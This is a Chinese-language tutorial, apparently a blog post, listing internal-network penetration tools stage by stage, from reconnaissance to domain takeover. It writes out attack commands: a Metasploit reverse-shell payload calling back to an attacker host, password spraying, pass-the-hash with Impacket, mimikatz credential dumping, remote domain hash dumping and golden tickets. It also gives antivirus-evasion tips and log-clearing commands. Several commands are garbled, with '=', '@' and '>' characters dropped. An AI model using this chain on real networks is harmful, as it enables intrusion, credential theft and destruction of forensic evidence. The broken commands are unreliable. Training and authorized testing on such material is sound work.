内网渗透核心工具清单:从信息收集到权限维持的实战指南

发布时间:2026/7/10 16:18:33
内网渗透核心工具清单:从信息收集到权限维持的实战指南 1. 项目概述一份面向新手的实战工具地图刚接触内网渗透面对网上浩如烟海的工具列表是不是感觉无从下手我刚开始那会儿也一样看到别人列出的几十上百个工具名头都大了根本不知道从哪学起更别提在实战里用起来了。后来踩过不少坑也带过一些新人我逐渐明白了一个道理对于新手而言工具在精不在多关键在于理解每个工具在渗透流程中的“生态位”以及如何将它们串联起来形成一套可复用的打法。这份“内网渗透核心工具清单”就是基于这个思路整理的。它不追求大而全而是聚焦于那些能覆盖80%以上常规内网实战场景的、经过验证的可靠工具。我的目标是当你拿到这份清单不仅能知道用什么更能明白为什么用、在哪个环节用、以及怎么组合起来用。无论是信息收集的“侦察兵”还是漏洞利用的“突击队”或是权限维持的“后勤保障”这里都会给你一个清晰的指引。对于小白和有一定基础但想系统化提升的朋友这份清单能帮你快速搭建起自己的内网渗透知识框架和实战工具箱避免在工具选择的海洋里迷失方向。2. 工具选型思路与实战流程映射2.1 为什么是这些工具选型背后的逻辑很多工具清单只是简单罗列但缺乏上下文。我挑选这些工具的核心原则有三个普适性、易用性、生态链。普适性工具应对常见的内网环境如Windows域、Linux服务器混合网络有良好的支持且其利用的技术或协议如SMB、LDAP、HTTP、DNS是内网中广泛存在的。这意味着你学会它在大部分场景下都能派上用场学习投入产出比高。易用性对于新手工具的安装复杂度、命令行友好度、文档是否清晰至关重要。我们优先选择那些社区活跃、遇到问题容易找到解决方案的工具。一些虽然强大但配置极其复杂的工具初期可以先放一放。生态链工具之间最好能“默契配合”。比如A工具扫描出的结果能直接作为B工具的输入或者一套工具集能覆盖从外到内、从横向移动到权限维持的完整链条。这能极大提升你的渗透效率。基于这些原则我摒弃了一些过于老旧、依赖特定环境或已被现代防御体系广泛检测的工具选择了当前2025年渗透测试社区中公认的、仍在积极维护的“中流砥柱”。2.2 内网渗透标准流程与工具对应关系为了让你更直观地理解工具如何使用我将一个简化的内网渗透流程与工具清单对应起来。这就像一个作战地图告诉你每一步该派哪支部队。信息收集与侦察这是所有行动的起点。目标是尽可能摸清内网结构、资产、用户、服务等信息。工具扮演“侦察兵”和“测绘卫星”的角色。漏洞利用与初始突破在收集的信息中寻找薄弱点获取第一个立足点通常是某台内网主机的权限。工具扮演“突击队”和“破门锤”的角色。权限提升与横向移动在立足点基础上提升权限至最高如SYSTEM/root并以此为跳板向网络内的其他机器扩散。工具扮演“特种部队”和“交通工具”的角色。权限维持与痕迹清理在目标机器上建立持久化访问通道以便随时返回并尝试清理留下的日志等痕迹。工具扮演“潜伏者”和“清洁工”的角色。数据提取与报告整理在获得足够权限后定位并提取敏感数据最后将所有攻击路径、证据整理成报告。工具扮演“搬运工”和“书记官”的角色。下面我们就按照这个流程逐一拆解每个阶段的核心工具。3. 核心工具详解与实战应用3.1 阶段一信息收集与侦察工具进入内网后的第一件事不是横冲直撞而是“看”。这个阶段的目标是绘制一张尽可能详细的网络地图。3.1.1 网络发现与存活主机探测Nmap是什么网络映射器堪称渗透测试的“瑞士军刀”功能极其强大但新手先从基础用起。核心用途发现内网中哪些IP地址是存活的有主机在线这些主机开放了哪些端口运行着什么服务。新手必会命令# 快速扫描一个C段192.168.1.0/24识别存活主机 nmap -sn 192.168.1.0/24 # 对单台主机进行端口扫描和服务识别更详细但更慢 nmap -sV -sC -O 192.168.1.105-sn: Ping扫描只探测存活不扫端口速度快。-sV: 探测服务版本。-sC: 使用默认的Nmap脚本进行一些基础漏洞检测和信息收集。-O: 尝试识别操作系统。实操心得-sn扫描是内网信息收集的第一步它能帮你快速缩小目标范围。-sSSYN半开放扫描比默认的-sT全连接扫描更隐蔽但需要root权限。注意在内网中一些主机可能禁用了ICMP回应导致-sn扫描漏报。此时可以结合ARP扫描如netdiscover或使用-Pn参数假定所有主机在线直接扫端口。3.1.2 自动化资产发现与漏洞扫描Nessus / OpenVAS是什么强大的漏洞扫描器。Nessus是商业软件有家庭免费版OpenVAS是其开源分支。核心用途对发现的主机进行深度扫描自动识别操作系统、应用程序、服务的已知漏洞CVE并给出风险评级和修复建议。它能帮你快速找到低垂的果实。使用场景当你通过Nmap发现了一批主机和开放服务后可以针对这些目标运行漏洞扫描快速定位可能存在远程代码执行、权限提升等高危漏洞的机器。注意事项漏洞扫描会产生大量网络流量和日志动静较大在需要隐蔽的测试中慎用。扫描结果需要人工研判存在一定误报率不能完全依赖自动化结果。对于新手OpenVAS足够学习使用其Web界面相对友好。3.1.3 内网服务枚举与信息榨取各类专项枚举工具在知道主机开放了特定服务如SMB、RPC、LDAP后需要使用专项工具进行深度信息枚举。SMB文件共享服务枚举enum4linux / smbmapenum4linux一个Perl脚本用于枚举Windows/Samba主机的SMB信息可以获取用户列表、共享列表、组信息、密码策略等。enum4linux -a 192.168.1.105smbmap用于枚举SMB共享的访问权限可以匿名或凭据访问并列出可读/可写的共享文件夹。smbmap -H 192.168.1.105 # 使用凭据枚举 smbmap -H 192.168.1.105 -u username -p passwordLDAP目录服务枚举ldapsearch如果目标是域控制器开放389端口ldapsearch是查询活动目录信息的利器。可以获取域内所有用户、计算机、组策略等海量信息。# 匿名查询如果允许的话 ldapsearch -x -H ldap://192.168.1.10 -b dcdomain,dclocal # 使用凭据查询 ldapsearch -x -H ldap://192.168.1.10 -D cnadmin,dcdomain,dclocal -w password -b dcdomain,dclocal3.2 阶段二漏洞利用与初始突破工具在侦察阶段我们可能发现了一些存在漏洞的服务。这个阶段的目标是利用这些漏洞拿到第一个shell命令执行权限。3.2.1 漏洞利用框架之王Metasploit Framework (MSF)是什么一个开源的渗透测试框架集成了大量的漏洞利用模块exploit、攻击载荷payload、辅助模块scanner, post等。核心用途为已知漏洞提供“一键式”利用。你找到漏洞编号CVEMSF里很可能就有对应的利用模块。基础使用流程启动msfconsole搜索模块search cve:2021-44228(例如Log4j漏洞)使用模块use exploit/multi/http/log4shell_header查看并设置选项show options然后set RHOSTS 192.168.1.105设置攻击载荷set payload windows/x64/meterpreter/reverse_tcp设置监听器本机set LHOST 192.168.1.100set LPORT 4444执行exploit实操心得meterpreter是MSF的高级、功能丰富的内存驻留型载荷比普通的cmd或shell载荷强大得多支持文件管理、键盘记录、权限提升等。使用reverse_tcp反向连接载荷时务必确保你的攻击机LHOSTIP和端口能被目标机访问到考虑内网IP和防火墙。重要提示MSF生成的exe载荷极易被杀毒软件查杀。在实战中通常需要对其进行编码、加壳或使用Veil-Evasion等工具生成免杀载荷。3.2.2 针对特定服务的利器永恒之蓝利用MS17-010虽然老旧但在一些未及时更新的内网中依然常见。MSF中有对应模块exploit/windows/smb/ms17_010_eternalblue。也有独立的利用脚本如AutoBlue。Web漏洞利用SQLmap如果内网有Web应用存在SQL注入点SQLmap是自动化注入和获取数据的首选。它可以进行布尔盲注、时间盲注、联合查询等并尝试获取数据库数据、甚至执行系统命令。# 基础检测 sqlmap -u http://192.168.1.105/news.php?id1 # 获取所有数据库名 sqlmap -u http://192.168.1.105/news.php?id1 --dbs # 获取指定数据库的所有表 sqlmap -u http://192.168.1.105/news.php?id1 -D database_name --tables3.3 阶段三权限提升与横向移动工具拿到一个普通用户权限的shell后工作才刚刚开始。我们需要提升权限并探索整个网络。3.3.1 Windows本地权限提升自动化信息收集WinPEAS / Seatbelt这些是运行在目标Windows机器上的脚本/可执行文件用于自动收集可能用于权限提升的信息如错误配置的服务、弱权限的文件夹、计划任务、注册表键值、凭证存储等。使用方式将winpeas.exe上传到目标机器并执行。它会生成一份详细的报告高亮显示可能存在问题的地方。踩坑记录这些工具本身也可能被杀毒软件识别。可以尝试混淆、使用无文件执行方式如通过CertUtil下载并执行或使用其.bat脚本版本。内核漏洞利用Windows-Exploit-Suggester / Sherlock这些工具通过比对目标系统补丁情况推荐可能适用的本地提权漏洞如CVE-2021-36934。流程在攻击机上运行脚本分析从目标机收集的系统信息如systeminfo命令输出给出漏洞利用建议。然后寻找对应的提权EXP如MSF中的exploit/windows/local/...模块进行利用。3.3.2 横向移动凭证传递与哈希攻击在内网中一台机器的密码或哈希值很可能在其他机器上复用。密码喷射与爆破Hydra / Medusa当获取到一些用户名如从LDAP枚举得到后可以用这些工具对特定服务如SMB, RDP, SSH进行密码爆破。# 使用Hydra对SMB服务进行密码喷射一个密码尝试所有用户 hydra -L userlist.txt -p Company2024! smb://192.168.1.105注意爆破会产生大量失败登录日志极易触发告警。密码喷射一个密码试多个用户比传统爆破一个用户试多个密码相对隐蔽。哈希传递攻击Impacket套件这是内网横向移动的“神技”。如果你抓取到了用户的NTLM哈希甚至不需要明文密码就可以用它直接认证到其他机器。Impacket是一组用Python编写的网络协议工具其中多个工具用于此类攻击。psexec.py使用哈希或密码获取目标机器的SYSTEM权限shell。python3 psexec.py domain/user192.168.1.106 -hashes :NTLM_Hashsmbexec.py类似psexec但执行命令的方式不同可能更隐蔽。wmiexec.py通过WMI协议执行命令不需要在目标上安装服务非常隐蔽。实操核心如何获取哈希常用工具是mimikatzWindows或从内存转储中提取。在MSF的meterpreter中可以使用hashdump命令抓取本地SAM数据库中的哈希或使用kiwi扩展加载mimikatz抓取内存中的明文密码和哈希。票据传递攻击Kerberos相关工具在Windows域环境中Kerberos票据是主要的认证方式。如果获取了域控的KRBTGT账户哈希可以制作黄金票据访问域内任何服务。如果获取了域管理员的TGT票据可以进行票据传递。这需要用到mimikatz或Impacket中的ticketer.py等工具。注意Kerberos攻击涉及的概念较复杂是内网渗透进阶的必修课。3.4 阶段四权限维持与痕迹清理工具3.4.1 后门与持久化Web Shell如果存在Web服务器上传一个一句话木马或功能更强的Web Shell如AntSword的aspx/php马是常见的维持方式。计划任务在Windows/Linux上创建计划任务定期连接回攻击机。服务创建在Windows上创建一个自启动服务用于维持权限。MSF的持久化模块MSF的post/windows/manage/persistence_exe等模块可以自动化完成这些操作。Cobalt Strike / Empire这些是更高级的C2命令与控制框架提供了多种持久化机制和隐蔽的通信通道但学习曲线较陡。3.4.2 痕迹清理谨慎操作清除日志在Windows上可以使用wevtutil命令清除事件查看器日志。在meterpreter中有clearev命令。清除历史命令在Linux上history -c在Windows上清除%USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt等文件。重要警告在真实的授权测试中是否清理痕迹、清理到什么程度必须严格遵守测试授权协议ROE。盲目清理可能破坏取证证据引发法律风险。在练习环境中可以操作以了解原理。3.5 阶段五数据提取与整理工具3.5.1 敏感信息搜索LinPEAS / WinPEAS它们在提权阶段也能搜索敏感文件、配置文件、数据库连接字符串等。find / grep 命令在Linux/Windows上使用命令搜索包含关键词如password,secret,key的文件。# Linux示例 find / -type f -name *.txt -o -name *.xml -o -name *.conf 2/dev/null | xargs grep -l -i password 2/dev/null3.5.2 报告编写CherryTree / KeepNote好用的笔记软件用于在测试过程中实时记录命令、截图、发现。Dradis Framework一个开源的协作报告平台可以将工具输出、笔记、证据集中管理并生成最终报告。截图工具msf中的screenshare命令或独立的SharpScreenShot等工具用于记录图形界面证据。4. 工具链整合与实战工作流示例光知道单个工具不够我们来看一个简单的实战串联场景假设我们已经通过某种方式进入了内网一台Windows 10主机普通用户权限。场景目标从当前立足点尝试获取域管理员权限。信息收集立足点本地上传并运行WinPEAS或执行systeminfo、whoami /all、net user、net localgroup administrators等命令收集本地信息。使用ipconfig /all和arp -a查看网络配置和邻居。使用nslookup查询DNS服务器通常就是域控制器。权限提升本地根据WinPEAS报告发现一个以SYSTEM权限运行但路径可写的服务。利用msfvenom生成反向shell载荷替换服务二进制文件重启服务获取SYSTEM权限。或者使用Windows-Exploit-Suggester分析systeminfo输出找到一个合适的本地提权EXP并利用。凭证窃取本地获得SYSTEM权限后在meterpreter中加载kiwi(load kiwi)运行kiwi_cmd sekurlsa::logonpasswords尝试抓取内存中的明文密码和哈希。或者运行hashdump获取本地用户哈希。横向移动域内假设抓取到了域用户DOMAIN\john的哈希。使用Impacket的psexec.py或wmiexec.py尝试用该哈希登录之前信息收集发现的另一台服务器如192.168.1.106。python3 wmiexec.py -hashes :NTLM_Hash DOMAIN/john192.168.1.106如果成功就在新机器上重复步骤1-3收集更多凭证。特别注意寻找域管理员登录过的机器以期抓取到域管哈希或票据。域控攻击如果获得了域管理员哈希可以直接使用psexec.py或smbexec.py连接域控制器192.168.1.10获取最高权限。或者使用secretsdump.pyImpacket远程转储域控上的所有哈希包括KRBTGT。python3 secretsdump.py -hashes :DomainAdmin_Hash DOMAIN/DomainAdmin192.168.1.10权限维持在域控上使用golden_ticket功能mimikatz创建黄金票据以便未来随时访问域内任何资源。或者在关键服务器上部署一个隐蔽的后门服务。这个流程展示了工具如何环环相扣。WinPEAS/MSF用于本地信息收集和提权mimikatz/kiwi用于抓凭证Impacket套件用于横向移动最终达成目标。5. 新手入门路径与避坑指南5.1 学习与搭建环境搭建靶场不要在真实网络练习使用VMware或VirtualBox搭建自己的内网靶场。推荐从Metasploitable2/3、Windows 7/10 虚拟机、OWASP Broken Web Apps等易受攻击的镜像开始。进阶可以使用HackTheBox、TryHackMe的在线实验室或自己用Windows Server搭建一个简单的域环境。工具安装Kali Linux是渗透测试的集成系统包含了上述绝大多数工具。对于Windows下的工具如mimikatz务必从官方或可信源下载并在虚拟机中运行避免被杀毒软件误杀。分阶段学习不要试图一口吃成胖子。先精通信息收集Nmap, enum4linux和基础漏洞利用MSF的基本使用。然后再攻克权限提升和横向移动这两个内网核心。最后学习权限维持和免杀技术。5.2 常见问题与排查技巧工具执行没反应或报错检查依赖很多Python工具如Impacket需要特定库。仔细阅读工具的README.md使用pip install -r requirements.txt安装依赖。检查权限一些扫描或攻击需要root/Administrator权限。检查网络连通性确保攻击机和靶机在同一网络防火墙规则允许相关流量如445、139端口。查看错误信息将错误信息直接复制到搜索引擎很大概率能找到解决方案。Payload无法回连确认LHOST/LPORTLHOST必须是靶机能够访问到的攻击机IP。在NAT网络或复杂网络下可能需要设置端口转发。检查防火墙攻击机上的防火墙可能阻止了反向连接端口。临时关闭或添加规则。尝试不同Payload如果reverse_tcp不行试试reverse_http或reverse_https它们可能能绕过出口限制。哈希传递攻击失败确认哈希类型确保你使用的是NTLM哈希通常是32位十六进制字符串而不是LM哈希或别的什么。确认账户状态账户是否被禁用密码是否已过期目标服务支持目标服务器是否禁用了NTLM认证强制使用Kerberos这在较新的Windows Server上常见。防火墙和杀软目标机器的防火墙可能阻止了SMB/WMI等协议端口或者杀软拦截了PsExec的行为。操作被安全设备发现降低速度扫描和爆破时使用-T参数Nmap或调整线程数降低发包速率。使用隐蔽扫描如Nmap的-sS、-sN、-sF等。使用合法协议优先使用WMI、WinRM、RDP等管理协议进行横向移动比SMB更不易被标记为异常。加密通信使用HTTPS、DNS隧道等加密通道的C2框架。5.3 最重要的原则合法与授权所有技术和工具都必须在合法授权的范围内使用。未经授权对任何系统进行测试都是违法行为。学习渗透测试的最佳途径是搭建自己的家庭实验室、使用在线靶场平台、或参与企业授权的安全众测项目。保持好奇心和学习热情的同时务必坚守法律和道德的底线。这份工具清单是你的“武器库”但请记住真正的“剑道”在于如何负责任地使用它们来提升网络的安全性。